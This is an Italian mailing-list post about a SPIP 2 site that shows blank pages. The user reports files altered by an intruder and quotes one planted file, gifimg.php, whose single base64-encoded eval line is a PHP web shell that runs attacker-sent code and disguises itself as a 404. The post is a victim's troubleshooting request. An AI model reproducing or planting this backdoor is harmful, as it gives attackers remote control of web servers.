Sergej
Tue, 20 Oct 2009 09:45:02 -0700
Renato Formato ha scritto:
Il 20 ottobre 2009 16.10, Sergej <s.ser...@tiscalinet.it> ha scritto:Renato Formato ha scritto:Sergej ha scritto:problemi installazione spip 2: il risultato è sempre una pagina bianca.Anche questo? rinominare temporaneamente mes_options.php, che si può trovare in ecrire/ oppure in config/a suo tempo, provato anche questo...Mistero....chiamiamo Ruggeri? :)
beh, un esorcista senz'altro... ;-)
Inoltre, sarebbe il caso di installare anche l'ecran_securite, un file per chi non può fare upgrade ma vuole avere tutte le patch di sicurezza.Il file va depositato in config/ e non nella root. In ogni caso, questo suggerimento non credo possa risolvere o riparare
messo l'ecran_securite dentro config, e modificato mes_optionsil test di cui parla http://www.spip.net/fr_article4200.html ha dato esito positivo. abbiamo lo "scudo".
mi sono messo a controllare tutti i files di spip e ho visto che ce n'erano diversi modificati non da noi; tutti dentro ecrire e dist, tutti i files nominati come index o config, e tutti i js. Li ho ripubblicati e messo i chmod a 555.
In più, ho trovato dentro dist/images un file chiamato gifimg.php contenente questa sola riga di codice:
<?php eval(base64_decode('aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpO2Vsc2UgZGllKCc0MDQgTm90IEZvdW5kJyk7'));?>
è un file che appartiene a spip o è estraneo? qualcuno ha un decifratore esadecimale per vedere cosa significa?(un anno fa circa c'erano i siti asp che venivano sottoposti a sql injection tramite immissione di codice in formato esadecimale...).
sergej _______________________________________________ spip-it@rezo.net - http://listes.rezo.net/mailman/listinfo/spip-it